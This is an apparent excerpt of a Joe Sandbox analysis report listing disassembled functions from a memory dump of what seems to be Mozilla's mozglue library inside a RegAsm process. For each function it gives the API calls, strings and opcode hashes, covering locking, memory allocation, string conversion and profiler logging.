                                                                            Function 6CC43A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AcquireSRWLockShared.KERNEL32 ref: 6CC43BB4
                                                                            • ReleaseSRWLockShared.KERNEL32 ref: 6CC43BD2
                                                                            • AcquireSRWLockExclusive.KERNEL32 ref: 6CC43BE5
                                                                            • ReleaseSRWLockExclusive.KERNEL32 ref: 6CC43C91
                                                                            • ReleaseSRWLockShared.KERNEL32 ref: 6CC43CBD
                                                                            • moz_xmalloc.MOZGLUE ref: 6CC43CF1
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 1881024734-0
                                                                            • Opcode ID: e7b4137685bf5dc6ab23edceeca029da9df828a227552669e7664d9a9994d071
                                                                            • Instruction ID: e352c688748c690a1130ce2487ad8135125a0361c86616790666ffc7e0f94dae
                                                                            • Opcode Fuzzy Hash: e7b4137685bf5dc6ab23edceeca029da9df828a227552669e7664d9a9994d071
                                                                            • Instruction Fuzzy Hash: EAC16CB5A097418FC714DF29C08465ABBF1BF89304F19CA5ED8998BB11E731E885CB82
                                                                            Function 6CC78ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC3EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC3EB83
                                                                            • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6CC7B392,?,?,00000001), ref: 6CC791F4
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                            • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                            • API String ID: 3790164461-3347204862
                                                                            • Opcode ID: 636f2ccf26a5ee0907b789879e4e718fcd2caddc5bf4bb09952b97df2e5aafbf
                                                                            • Instruction ID: 0c4efa25f905736eceef55707aba2a532bc01767e8cc9e2cc0dd2c328e6e6fd5
                                                                            • Opcode Fuzzy Hash: 636f2ccf26a5ee0907b789879e4e718fcd2caddc5bf4bb09952b97df2e5aafbf
                                                                            • Instruction Fuzzy Hash: 97B1C4B0A0120A9BDB14CFA9C895BEEBBB5FF85358F104019D905ABF80F7319945CBE1
                                                                            Function 6CC5C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC5C5A3
                                                                            • WideCharToMultiByte.KERNEL32 ref: 6CC5C9EA
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CC5C9FB
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CC5CA12
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC5CA2E
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC5CAA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                            • String ID: (null)$0
                                                                            • API String ID: 4074790623-38302674
                                                                            • Opcode ID: 2819172353aa728e3dac5af3b3757e855eb0986eb86c10ce2db094ef8050daf8
                                                                            • Instruction ID: 0d33ddf7d7e43faeb4ab26ca9b4bae91f20132de202599faa0f6807b7c72b0ef
                                                                            • Opcode Fuzzy Hash: 2819172353aa728e3dac5af3b3757e855eb0986eb86c10ce2db094ef8050daf8
                                                                            • Instruction Fuzzy Hash: C9A19C716083429FDB00DF29C98475ABBF1FF89748F44882DE899D7641EB31D825CB9A
                                                                            Function 6CC5C769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC5C784
                                                                            • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC5C801
                                                                            • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6CC5C83D
                                                                            • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC5C891
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                            • String ID: INF$NAN$inf$nan
                                                                            • API String ID: 1991403756-4166689840
                                                                            • Opcode ID: e7d4d5bb30827784ae3fc954e276b9615268e6332ef3ea422cef169ddb1e82cc
                                                                            • Instruction ID: 4c7851381f7f93ec6a11652519b002619245002b9f1df180a070a7477c6520a2
                                                                            • Opcode Fuzzy Hash: e7d4d5bb30827784ae3fc954e276b9615268e6332ef3ea422cef169ddb1e82cc
                                                                            • Instruction Fuzzy Hash: 73517F709087408BD700EF6DC58129AFBF0BF9E348F408A2DE9D5A7651F770D9A58B46
                                                                            Function 6CC33480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC33492
                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC334A9
                                                                            • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC334EF
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CC3350E
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC33522
                                                                            • __aulldiv.LIBCMT ref: 6CC33552
                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC3357C
                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC33592
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                            • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                            • API String ID: 3634367004-706389432
                                                                            • Opcode ID: ff96e90ec97a0c72975c3f0b5b8e4e55d8daf5a1710aa8b6562444c51d891652
                                                                            • Instruction ID: edc28577c8aea47a583d8feb27e1eaa829eea6e1ce6bde14b464af23201402fb
                                                                            • Opcode Fuzzy Hash: ff96e90ec97a0c72975c3f0b5b8e4e55d8daf5a1710aa8b6562444c51d891652
                                                                            • Instruction Fuzzy Hash: 4D318F79B00216AFDF04DFF9D9A8AAA77B5FB45304F140029E905A3760FB74A905CB64
                                                                            Function 6CC34480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$moz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 3009372454-0
                                                                            • Opcode ID: 7b37956dfa3fc138de62f9958c9f244c03cc508dae8da5b364b3fa484d6a3722
                                                                            • Instruction ID: ff3c0450668a1d5056512e62edd2afd3b279d8599230692782be0fb4514e6c8c
                                                                            • Opcode Fuzzy Hash: 7b37956dfa3fc138de62f9958c9f244c03cc508dae8da5b364b3fa484d6a3722
                                                                            • Instruction Fuzzy Hash: FBB1D671A015208FDB14DF2CE89476D7BB1AF42318F185669E81ADFB96F732D840CB92
                                                                            Function 6CC9AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                            • String ID:
                                                                            • API String ID: 1192971331-0
                                                                            • Opcode ID: 7955cbc67ea8520dd5f9505be140c231ceab7df21003ad080998791025faa6a6
                                                                            • Instruction ID: e3348bc33ade1096fecf8a16a0bfc9527c122150a00c4ea79ebfef773ae178c0
                                                                            • Opcode Fuzzy Hash: 7955cbc67ea8520dd5f9505be140c231ceab7df21003ad080998791025faa6a6
                                                                            • Instruction Fuzzy Hash: 1E3185B19047458FDB00EFBDD68926EBBF0FF85305F014A2DE98587261EB709458CB92
                                                                            Function 6CC6F2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC6D9DB), ref: 6CC6F2D2
                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6CC6F2F5
                                                                            • moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6CC6F386
                                                                            • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6CC6F347
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6CC6F3C8
                                                                            • free.MOZGLUE(00000000,00000000), ref: 6CC6F3F3
                                                                            • free.MOZGLUE(00000000,00000000), ref: 6CC6F3FC
                                                                            • free.MOZGLUE(00000000,?,?,00000000), ref: 6CC6F413
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: freemoz_xmalloc$HandleModule$malloc
                                                                            • String ID: ntdll.dll
                                                                            • API String ID: 301460908-2227199552
                                                                            • Opcode ID: 1b36c45d13637512dc3749a4ee89f67d10bbcd55863474dcad14c1aedf06b23c
                                                                            • Instruction ID: 94bfce5d39384644f6be0b7816c224f44c9d2e45e61e07760fa820e5d47107e9
                                                                            • Opcode Fuzzy Hash: 1b36c45d13637512dc3749a4ee89f67d10bbcd55863474dcad14c1aedf06b23c
                                                                            • Instruction Fuzzy Hash: A74126B5A002149FDB048F6AE9947AE77B4EF46358F20843DE81AA7F90FB31A445C785
                                                                            Function 6CC96A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InitializeCriticalSection.KERNEL32(6CCBF618), ref: 6CC96A68
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC96A7D
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC96AA1
                                                                            • EnterCriticalSection.KERNEL32(6CCBF618), ref: 6CC96AAE
                                                                            • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC96AE1
                                                                            • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC96B15
                                                                            • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CC96B65
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF618,?,?), ref: 6CC96B83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
                                                                            • String ID: SymInitialize
                                                                            • API String ID: 3103739362-3981310019
                                                                            • Opcode ID: 59d9bc632e86150e286768f657f78f95a5c9d0fd407a3e6b144fb7762d377376
                                                                            • Instruction ID: 392e6fb64e2771611a4212bde73488f4269b526a61560d15b78a86b7a4e0ca12
                                                                            • Opcode Fuzzy Hash: 59d9bc632e86150e286768f657f78f95a5c9d0fd407a3e6b144fb7762d377376
                                                                            • Instruction Fuzzy Hash: 3041B0746053859FDB00CFB8C888B9A7BB8AB46304F044079FD48DB692EBB09504CBA5
                                                                            Function 6CC49620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CC49675
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC49697
                                                                            • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CC496E8
                                                                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CC49707
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4971F
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49773
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CC497B7
                                                                            • FreeLibrary.KERNEL32 ref: 6CC497D0
                                                                            • FreeLibrary.KERNEL32 ref: 6CC497EB
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49824
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                            • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                            • API String ID: 409848716-3880535382
                                                                            • Opcode ID: 375ecae539433f7f7cea4ae29875b971b86db83afa0741fd80b2b20a701fa365
                                                                            • Instruction ID: 0a6b52c396934239eb5382cd11bc346325642a2a766f28994c9e4afe120d67a2
                                                                            • Opcode Fuzzy Hash: 375ecae539433f7f7cea4ae29875b971b86db83afa0741fd80b2b20a701fa365
                                                                            • Instruction Fuzzy Hash: 1F41B1B87002159FDF00CFE9D9C5A9677B8EB89318F008169ED15A7B40F730E904CBA5
                                                                            Function 6CC31E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC31EC1
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC31EE1
                                                                            • EnterCriticalSection.KERNEL32(6CCBE744), ref: 6CC31F38
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE744), ref: 6CC31F5C
                                                                            • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CC31F83
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC31FC0
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC31FE2
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC31FF6
                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC32019
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                            • String ID: MOZ_CRASH()
                                                                            • API String ID: 2055633661-2608361144
                                                                            • Opcode ID: a8e5292d97d38529cc530a25ba1d5e297e7eff6e685b3af6487fa51d015deab8
                                                                            • Instruction ID: bd456f5023fca5b3950fc2b9c186538b2e9f57e5a177241b6ba9974f19da1abf
                                                                            • Opcode Fuzzy Hash: a8e5292d97d38529cc530a25ba1d5e297e7eff6e685b3af6487fa51d015deab8
                                                                            • Instruction Fuzzy Hash: E541C175B002258FDF009FE9D8D8B6A37B5EF4A748F140069F909A7741EB7598048BD9
                                                                            Function 6CC95FF0 Relevance: 15.1, APIs: 10, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32 ref: 6CC96009
                                                                            • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CC96024
                                                                            • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6CC3EE51,?), ref: 6CC96046
                                                                            • OutputDebugStringA.KERNEL32(?,6CC3EE51,?), ref: 6CC96061
                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC96069
                                                                            • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC96073
                                                                            • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC96082
                                                                            • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6CCB148E), ref: 6CC96091
                                                                            • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6CC3EE51,00000000,?), ref: 6CC960BA
                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC960C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                            • String ID:
                                                                            • API String ID: 3835517998-0
                                                                            • Opcode ID: 1c4ecad380a71adc1bab727fc8fc6dbdfbb1e15581c2204a0f7a149ec270915f
                                                                            • Instruction ID: 3e53671e8ef5929d5497ef3d81b90d9c2128a7ac96b1f4b1926f6fe6d3086454
                                                                            • Opcode Fuzzy Hash: 1c4ecad380a71adc1bab727fc8fc6dbdfbb1e15581c2204a0f7a149ec270915f
                                                                            • Instruction Fuzzy Hash: F521F4B1A002189FDF105F64DC88AAE7BB8FF45318F008428F81AD7680DB74A559CFE9
                                                                            Function 6CC80000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC80039
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC80041
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC80075
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC80082
                                                                            • moz_xmalloc.MOZGLUE(00000048), ref: 6CC80090
                                                                            • free.MOZGLUE(?), ref: 6CC80104
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC8011B
                                                                            Strings
                                                                            • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6CC8005B
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                            • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                            • API String ID: 3012294017-637075127
